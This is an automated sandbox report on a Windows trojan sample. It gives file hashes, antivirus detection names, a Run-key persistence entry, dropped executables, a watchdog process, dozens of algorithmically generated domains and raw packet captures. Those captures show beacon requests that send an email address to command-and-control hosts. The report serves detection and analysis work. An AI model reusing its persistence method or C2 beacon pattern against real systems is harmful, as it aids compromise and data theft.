Analysis Date2015-07-27 18:47:20
MD58de98ec43744dfdcbbd440be037bb9ad
SHA1f516c7e82ed5b5b2c16fca8aaea750c1ca014407

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d362b3b6f821e7c63430cbf68814b648 sha1: a9732c69e049618956cc1e737a29ed6ae2d4566e size: 301056
Section.rdata md5: dd09ae87b075a426e4f337515b9a1485 sha1: ff587f35fc80e0b3358571711b251459c8be680c size: 34816
Section.data md5: 6dc8997cc8bfa739631ab683259089b4 sha1: b313c651bd6d161dcffbe666f04abc743006e6f0 size: 100864
Timestamp2014-10-30 10:11:53
PackerMicrosoft Visual C++ ?.?
PEhash13c7c58493b946492c56c54eb7e9644087237eaa
IMPhash5d3e7ec6260c2b1d2178c30617dfff5a
AVRising0x57c13024
AVMcafeeTrojan-FEMT!8DE98EC43744
AVAvira (antivir)TR/ATRAPS.Gen2
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7no_virus
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Agent.gen
AVAuthentiumW32/Wonton.B2.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTSPY_NIVDORT.SMB
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. WebTrojan.DownLoader15.3578
AVF-SecureGen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AutoConnect Thread Trap Compatibility ➝
C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\nddvvoo\cefhxxmuwrv.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.hn
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\nddvvoo\cpiwfijlljt.exe"

Network Details:

DNSsweetsmell.net
Type: A
176.34.234.43
DNSsweetsmell.net
Type: A
46.137.81.225
DNSsweetsmell.net
Type: A
54.75.225.111
DNSsweetsmell.net
Type: A
54.246.118.68
DNSsweetsmell.net
Type: A
54.246.123.138
DNSsweetsmell.net
Type: A
79.125.109.53
DNSsimplehealth.net
Type: A
98.124.198.1
DNSpossibleseparate.net
Type: A
208.91.197.241
DNSmountainhealth.net
Type: A
69.64.147.249
DNSwinterclothes.net
Type: A
66.151.181.49
DNSleaveseparate.net
Type: A
95.211.230.75
DNSsweethealth.net
Type: A
50.63.202.3
DNSwintersafety.net
Type: A
DNSsubjectsafety.net
Type: A
DNSwinterfuture.net
Type: A
DNSsubjectfuture.net
Type: A
DNSfinishsmell.net
Type: A
DNSleavesmell.net
Type: A
DNSfinishearly.net
Type: A
DNSleaveearly.net
Type: A
DNSfinishsafety.net
Type: A
DNSleavesafety.net
Type: A
DNSfinishfuture.net
Type: A
DNSleavefuture.net
Type: A
DNSprobablysmell.net
Type: A
DNSsweetearly.net
Type: A
DNSprobablyearly.net
Type: A
DNSsweetsafety.net
Type: A
DNSprobablysafety.net
Type: A
DNSsweetfuture.net
Type: A
DNSprobablyfuture.net
Type: A
DNSseveralsmell.net
Type: A
DNSmaterialsmell.net
Type: A
DNSseveralearly.net
Type: A
DNSmaterialearly.net
Type: A
DNSseveralsafety.net
Type: A
DNSmaterialsafety.net
Type: A
DNSseveralfuture.net
Type: A
DNSmaterialfuture.net
Type: A
DNSseveraseparate.net
Type: A
DNSlaughseparate.net
Type: A
DNSseverahealth.net
Type: A
DNSlaughhealth.net
Type: A
DNSseveraclothes.net
Type: A
DNSlaughclothes.net
Type: A
DNSseveradistant.net
Type: A
DNSlaughdistant.net
Type: A
DNSsimpleseparate.net
Type: A
DNSmotherseparate.net
Type: A
DNSmotherhealth.net
Type: A
DNSsimpleclothes.net
Type: A
DNSmotherclothes.net
Type: A
DNSsimpledistant.net
Type: A
DNSmotherdistant.net
Type: A
DNSmountainseparate.net
Type: A
DNSpossiblehealth.net
Type: A
DNSmountainclothes.net
Type: A
DNSpossibleclothes.net
Type: A
DNSmountaindistant.net
Type: A
DNSpossibledistant.net
Type: A
DNSperhapsseparate.net
Type: A
DNSwindowseparate.net
Type: A
DNSperhapshealth.net
Type: A
DNSwindowhealth.net
Type: A
DNSperhapsclothes.net
Type: A
DNSwindowclothes.net
Type: A
DNSperhapsdistant.net
Type: A
DNSwindowdistant.net
Type: A
DNSwinterseparate.net
Type: A
DNSsubjectseparate.net
Type: A
DNSwinterhealth.net
Type: A
DNSsubjecthealth.net
Type: A
DNSsubjectclothes.net
Type: A
DNSwinterdistant.net
Type: A
DNSsubjectdistant.net
Type: A
DNSfinishseparate.net
Type: A
DNSfinishhealth.net
Type: A
DNSleavehealth.net
Type: A
DNSfinishclothes.net
Type: A
DNSleaveclothes.net
Type: A
DNSfinishdistant.net
Type: A
DNSleavedistant.net
Type: A
DNSsweetseparate.net
Type: A
DNSprobablyseparate.net
Type: A
DNSprobablyhealth.net
Type: A
DNSsweetclothes.net
Type: A
DNSprobablyclothes.net
Type: A
DNSsweetdistant.net
Type: A
DNSprobablydistant.net
Type: A
DNSseveralseparate.net
Type: A
HTTP GEThttp://sweetsmell.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent:
HTTP GEThttp://simplehealth.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent:
HTTP GEThttp://possibleseparate.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent:
HTTP GEThttp://mountainhealth.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent:
HTTP GEThttp://winterclothes.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent:
HTTP GEThttp://leaveseparate.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent:
HTTP GEThttp://sweethealth.net/index.php?email=nicola.ma@ictangshan.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 176.34.234.43:80
Flows TCP192.168.1.1:1032 ➝ 98.124.198.1:80
Flows TCP192.168.1.1:1033 ➝ 208.91.197.241:80
Flows TCP192.168.1.1:1034 ➝ 69.64.147.249:80
Flows TCP192.168.1.1:1035 ➝ 66.151.181.49:80
Flows TCP192.168.1.1:1036 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1037 ➝ 50.63.202.3:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207377    close..Host: sw
0x00000070 (00112)   65657473 6d656c6c 2e6e6574 0d0a0d0a   eetsmell.net....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207369    close..Host: si
0x00000070 (00112)   6d706c65 6865616c 74682e6e 65740d0a   mplehealth.net..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a20706f    close..Host: po
0x00000070 (00112)   73736962 6c657365 70617261 74652e6e   ssibleseparate.n
0x00000080 (00128)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206d6f    close..Host: mo
0x00000070 (00112)   756e7461 696e6865 616c7468 2e6e6574   untainhealth.net
0x00000080 (00128)   0d0a0d0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207769    close..Host: wi
0x00000070 (00112)   6e746572 636c6f74 6865732e 6e65740d   nterclothes.net.
0x00000080 (00128)   0a0d0a0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a206c65    close..Host: le
0x00000070 (00112)   61766573 65706172 6174652e 6e65740d   aveseparate.net.
0x00000080 (00128)   0a0d0a0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6e6963 6f6c612e 6d614069   mail=nicola.ma@i
0x00000020 (00032)   6374616e 67736861 6e2e636f 6d266d65   ctangshan.com&me
0x00000030 (00048)   74686f64 3d706f73 74266c65 6e204854   thod=post&len HT
0x00000040 (00064)   54502f31 2e300d0a 41636365 70743a20   TP/1.0..Accept: 
0x00000050 (00080)   2a2f2a0d 0a436f6e 6e656374 696f6e3a   */*..Connection:
0x00000060 (00096)   20636c6f 73650d0a 486f7374 3a207377    close..Host: sw
0x00000070 (00112)   65657468 65616c74 682e6e65 740d0a0d   eethealth.net...
0x00000080 (00128)   0a0d0a0a 0d0a                         ......


Strings